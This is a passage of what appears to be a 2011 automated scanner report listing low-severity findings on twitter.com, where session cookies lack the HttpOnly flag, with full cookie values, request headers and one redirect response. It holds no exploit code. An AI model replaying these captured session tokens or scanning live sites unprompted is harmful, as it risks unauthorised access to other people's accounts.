_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Svantasukhai HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.64. http://twitter.com/THE_REAL_SHAQ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/THE_REAL_SHAQ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /THE_REAL_SHAQ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.65. http://twitter.com/TV38Boston previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/TV38Boston

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TV38Boston HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.66. http://twitter.com/TechCrunch previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/TechCrunch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.67. http://twitter.com/TheKateBosworth previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/TheKateBosworth

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TheKateBosworth HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.68. http://twitter.com/Trackgals previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Trackgals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Trackgals HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.69. http://twitter.com/Trackgals/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Trackgals/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Trackgals/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.70. http://twitter.com/_juliannemoore previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/_juliannemoore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_juliannemoore HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.71. http://twitter.com/about previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlZThlMDExYjJmNmQzODczNjgwYWY4M2RiNzlhYTY5%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5f458640ebcf7c125bea2d557117ee384f19570f; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.72. http://twitter.com/about/contact previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.73. http://twitter.com/about/resources previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlYTdlYjkyMDk3OTcwMTQxNTFlMjM2ZmE3YmE4ODJj%250ANmM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5ad46e0e7e340cae0b9f7ca2011b39284030c689; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.74. http://twitter.com/account/complete previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/complete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlODI5MmUyYjNjZTVmMGNlMzU4NGJlM2JjNGVkMTQ1%250AYTA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--9ac191e704e10670dc258c58c1b2e5f1e8b10885; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/complete HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.75. http://twitter.com/account/profile_image/malsup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/profile_image/malsup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIjRodHRwOi8vdHdpdHRlci5jb20vYWNjb3VudC9w%250Acm9maWxlX2ltYWdlL21hbHN1cDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0%250AYWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--efeb79c67fc2a12bf68668d2c6c44713e044d3b4; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/profile_image/malsup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup
X-Runtime: 0.00294
Content-Type: text/html; charset=utf-8
Content-Length: 147
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIjRodHRwOi8vdHdpdHRlci5jb20vYWNjb3VudC9w%250Acm9maWxlX2ltYWdlL21hbHN1cDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0%250AYWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--efeb79c67fc2a12bf68668d2c6c44713e044d3b4; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:30:36 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup">redirected</a>.</body></html>

11.76. http://twitter.com/account/resend_password previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlMDI3MTAzYTcyMjcyM2VhZDQyN2NiOGRlNTEyNWE5%250AZTc6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c7b8267380c61b856a14710cd449961d09a51a3c; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.77. http://twitter.com/ajpiano previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ajpiano

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajpiano HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.78. http://twitter.com/androidnewsblog previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/androidnewsblog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /androidnewsblog HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
